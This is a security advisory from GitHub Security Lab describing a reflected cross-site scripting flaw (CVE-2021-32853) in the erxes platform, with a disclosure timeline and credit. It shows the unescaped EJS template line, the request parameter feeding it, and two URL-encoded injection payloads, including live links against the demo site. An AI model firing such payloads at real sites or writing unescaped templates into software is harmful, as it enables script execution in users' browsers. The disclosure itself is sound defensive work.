Coordinated Disclosure Timeline

  • 2021-08-31: Report sent to the maintainer.
  • 2021-09-03: No response. Sent again.
  • 2021-12-06: Asked for update.
  • 2021-12-07: Added info@erxes.io to recipients.
  • 2021-12-07: Public issue asking for contacts created.
  • 2022-01-19: An invitation to a private repo containing the report was sent to all members of the Erxes org.
  • 2022-01-19: All members of the Erxes org are tagged in the public issue with an explanation of what the invitation is about.
  • 2022-01-19: One of the members accepts the invitation.
  • 2022-02-01: No response. Publishing according to our coordinated disclosure policy.

Summary

Cross-site scripting (XSS) in https://github.com/erxes/erxes.

Product

https://github.com/erxes/erxes

Tested Version

The latest version at the time of testing.

Details

This template tag in widgets.ejs is vulnerable to code injection, because `<%- %>` is EJS's raw (unescaped) output tag:

  window.knowledgebaseSettings = {
    topic_id: "<%- kbTopicId %>"
  }

The value comes from a request parameter here:

  res.render('widget', {
    type: 'knowledgebase',
    env: getEnv(),
    kbTopicId: req.query.topicId
  });

The inserted value is not escaped, so one can break out of the string literal or the enclosing script tag:

  • widgets/knowledgebase?topicId=%22-alert(1)-%22
  • widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E

At the time of writing, this can be verified on the live demo by following these links (the payloads are harmless):

  • (xss link) https://demo.erxes.io/widgets/knowledgebase?topicId=%22-alert(1)-%22
  • (xss link) https://demo.erxes.io/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E

CVE

  • CVE-2021-32853

Impact

Arbitrary JavaScript execution in the victim's browser (client-side code execution in the origin of the erxes instance). The victim must follow a malicious link or be redirected from a malicious web site.

Credit

This issue was discovered by @asgerf (Asger F) from the GitHub CodeQL team.

Contact

You can contact the GHSL team at securitylab@github.com, please include GHSL-2021-103 in any communication regarding this issue.